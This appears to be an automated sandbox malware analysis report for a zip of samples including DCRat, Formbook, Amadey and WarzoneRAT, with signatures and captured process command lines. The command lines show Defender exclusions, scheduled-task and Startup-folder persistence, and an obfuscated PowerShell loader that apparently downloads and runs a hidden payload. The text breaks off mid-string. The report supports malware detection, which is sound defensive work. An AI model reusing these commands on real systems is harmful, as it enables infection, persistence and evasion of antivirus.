Malware Analysis Report

2024-10-19 09:24

Sample ID 230817-ydgersed3v
Target 2023-08-17-18.zip
SHA256 e33f116c4d031b092c1aa75e0cb68b5db4e362739a6b41c27475c3a0ddb32b3a
Tags
rat macro macro_on_action dcrat amadey formbook warzonerat wshrat sy22 infostealer spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e33f116c4d031b092c1aa75e0cb68b5db4e362739a6b41c27475c3a0ddb32b3a

Threat Level: Known bad

The file 2023-08-17-18.zip was found to be: Known bad.

Malicious Activity Summary

rat macro macro_on_action dcrat amadey formbook warzonerat wshrat sy22 infostealer spyware stealer trojan

Dcrat family

Formbook

WarzoneRat, AveMaria

Amadey family

DcRat

WSHRAT

DCRat payload

DCRat payload

Formbook payload

Warzone RAT payload

Office macro that triggers on suspicious action

Suspicious Office macro

Looks up external IP address via web service

Unsigned PE

Program crash

NSIS installer

Office document contains embedded OLE objects

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Gathers network information

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-17 19:40

Signatures

Amadey family

amadey

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Dcrat family

dcrat

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Office document contains embedded OLE objects

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-17 19:39

Reported

2023-08-17 19:50

Platform

win10v2004-20230703-en

Max time kernel

68s

Max time network

577s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-08-17-18.zip

Signatures

DcRat

rat infostealer dcrat

Formbook

trojan spyware stealer formbook

WSHRAT

trojan wshrat

WarzoneRat, AveMaria

rat infostealer warzonerat

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Warzone RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A checkip.dyndns.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A checkip.dyndns.org N/A N/A
N/A ip-api.com N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Office document contains embedded OLE objects

Description Indicator Process Target
N/A N/A N/A N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-08-17-18.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2023-08-17-18\" -spe -an -ai#7zMap7070:84:7zEvent9404

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\2023-08-17-18\0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1.xls"

C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe

"C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\comRuntimeCrtdll\reJQeYd4I.vbe"

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "

C:\comRuntimeCrtdll\agentbrowser.exe

"C:\comRuntimeCrtdll\agentbrowser.exe"

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\2023-08-17-18\4e8d2ed372068535d420927ad0f59dd34eda4f33f7bafcec6b694379b8948487.jar"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-08-17-18\7a57c3bcbdfc2482505bcf4c20885c1288635f780667a5cf4c7f0804251dd719.js"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs"

C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe

"C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe"

C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe

"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"

C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe

"C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe"

C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe

"C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aug.vbs"

C:\Users\Admin\AppData\Local\Tempwinlogon.exe

"C:\Users\Admin\AppData\Local\Tempwinlogon.exe"

C:\ProgramData\images.exe

"C:\ProgramData\images.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe"

C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe

"C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe"

C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe

"C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe"

C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe

"C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe"

C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe

"C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe"

C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe

"C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe

"C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4088 -ip 4088

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2023-08-17-18\940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71.rtf" /o ""

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1324

C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe

"C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe"

C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe

"C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe"

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\2023-08-17-18\f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b.xlsx"

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"

C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe

"C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe"

C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe

"C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe"

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')"

C:\Users\Admin\Desktop\2023-08-17-18\b0351062f7da26f1a85c0e6ed3edeb701aec500391a62b8f382f97084b395749.exe

"C:\Users\Admin\Desktop\2023-08-17-18\b0351062f7da26f1a85c0e6ed3edeb701aec500391a62b8f382f97084b395749.exe"

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 5

C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe

"C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe"

C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe

"C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe"

C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe

"C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe"

C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe

"C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe"

C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe

"C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe"

C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe

"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"

C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe

"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RbsgeknsO.bat" "

C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe

"C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\uiVprBevwjFGG.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uiVprBevwjFGG" /XML "C:\Users\Admin\AppData\Local\Temp\tmp50E0.tmp"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c mkdir "\\?\C:\Windows "

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe

"C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\szBUFHBkBccpfd.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\szBUFHBkBccpfd" /XML "C:\Users\Admin\AppData\Local\Temp\tmp91D1.tmp"

C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe

"C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ipconfig /release

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /release

C:\comRuntimeCrtdll\agentbrowser.exe

"C:\comRuntimeCrtdll\agentbrowser.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\comRuntimeCrtdll\reJQeYd4I.vbe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "

C:\comRuntimeCrtdll\agentbrowser.exe

"C:\comRuntimeCrtdll\agentbrowser.exe"

C:\Windows\system32\cmd.exe

cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')

C:\comRuntimeCrtdll\agentbrowser.exe

"C:\comRuntimeCrtdll\agentbrowser.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DY#@$#Mw#@$#v#@$#DY#@$#Mg#@$#x#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#dQBu#@$#Gk#@$#dgBl#@$#HI#@$#cwBv#@$#F8#@$#dgBi#@$#HM#@$#LgBq#@$#H#@$##@$#ZQBn#@$#D8#@$#MQ#@$#2#@$#Dk#@$#M#@$##@$#5#@$#DM#@$#MQ#@$#4#@$#DU#@$#NQ#@$#n#@$#Ds#@$#J#@$#B3#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#g#@$#D0#@$#I#@$#BO#@$#GU#@$#dw#@$#t#@$#E8#@$#YgBq#@$#GU#@$#YwB0#@$#C#@$##@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBO#@$#GU#@$#d#@$##@$#u#@$#Fc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#QgB5#@$#HQ#@$#ZQBz#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#LgBE#@$#G8#@$#dwBu#@$#Gw#@$#bwBh#@$#GQ#@$#R#@$#Bh#@$#HQ#@$#YQ#@$#o#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FU#@$#cgBs#@$#Ck#@$#Ow#@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBU#@$#GU#@$#e#@$#B0#@$#C4#@$#RQBu#@$#GM#@$#bwBk#@$#Gk#@$#bgBn#@$#F0#@$#Og#@$#6#@$#FU#@$#V#@$#BG#@$#Dg#@$#LgBH#@$#GU#@$#d#@$#BT#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#g#@$#D0#@$#I#@$##@$#n#@$#Dw#@$#P#@$#BC#@$#EE#@$#UwBF#@$#DY#@$#N#@$#Bf#@$#FM#@$#V#@$#BB#@$#FI#@$#V#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#RgBs#@$#GE#@$#Zw#@$#g#@$#D0#@$#I#@$##@$#n#@$#Dw#@$#P#@$#BC#@$#EE#@$#UwBF#@$#DY#@$#N#@$#Bf#@$#EU#@$#TgBE#@$#D4#@$#Pg#@$#n#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#p#@$#Ds#@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#Ek#@$#bgBk#@$#GU#@$#e#@$#BP#@$#GY#@$#K#@$##@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#ZwBl#@$#C#@$##@$#M#@$##@$#g#@$#C0#@$#YQBu#@$#GQ#@$#I#@$##@$#k#@$#GU#@$#bgBk#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#ZwB0#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#Kw#@$#9#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#u#@$#Ew#@$#ZQBu#@$#Gc#@$#d#@$#Bo#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#GU#@$#bgBk#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#I#@$##@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#Ow#@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#EM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#FM#@$#dQBi#@$#HM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Cw#@$#I#@$##@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#Ew#@$#ZQBu#@$#Gc#@$#d#@$#Bo#@$#Ck#@$#Ow#@$#k#@$#GM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#QgB5#@$#HQ#@$#ZQBz#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBD#@$#G8#@$#bgB2#@$#GU#@$#cgB0#@$#F0#@$#Og#@$#6#@$#EY#@$#cgBv#@$#G0#@$#QgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#EM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#KQ#@$#7#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBS#@$#GU#@$#ZgBs#@$#GU#@$#YwB0#@$#Gk#@$#bwBu#@$#C4#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#F0#@$#Og#@$#6#@$#Ew#@$#bwBh#@$#GQ#@$#K#@$##@$#k#@$#GM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#QgB5#@$#HQ#@$#ZQBz#@$#Ck#@$#Ow#@$#k#@$#HQ#@$#eQBw#@$#GU#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bs#@$#G8#@$#YQBk#@$#GU#@$#Z#@$#BB#@$#HM#@$#c